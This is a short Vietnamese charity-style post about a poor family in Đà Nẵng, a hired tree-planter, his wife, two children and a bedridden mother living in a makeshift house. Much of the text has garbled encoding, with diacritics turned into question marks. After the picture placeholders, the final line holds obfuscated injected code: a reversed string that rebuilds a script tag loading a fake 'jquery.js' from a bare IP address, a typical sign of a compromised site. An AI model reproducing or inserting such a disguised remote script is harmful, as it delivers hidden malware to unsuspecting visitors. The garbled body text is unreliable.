Đà Nẵng – Hoàn cảnh gia đình anh Nguyễn Văn Nghĩa


HTNA – Hoàn c?nh anh Nguy?n V?n Ngh?a, ch? Võ Th? Thùy Trang thu?c h? nghèo Thôn 1.Ngu?n thu chính c?a anh ch? t? vi?c làm thuê tr?ng cây keo lá tràm, tháng ???c tháng không, cu?c s?ng gia ?ình khó kh?n ch?t v?t khi ph?i lo cho 2 con nh? và ng??i M? già n?m li?t. Cu?c s?ng ?ã thi?u th?n b?n b? nay càng c?c nh?c và túng qu?n h?n. C?n nhà c?a anh ch? ?óng ch?p ghép t? nh?ng m?nh g?, mi?ng tôn không ?? s?c ch?ng ch?i v?i n?ng gió m?a bão kh?c nghi?t c?a mi?n trung. Cái nghèo c? ?eo bám, gánh n?ng cu?c s?ng ?? lên vai anh ch?, quá khó cho suy ngh? v? m?t ngôi nhà an bình trong nh?ng ngày gió bão n?i ?ây….

Picture33

Picture34

Picture35

Picture36

Picture37

  tpircs/<>“sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))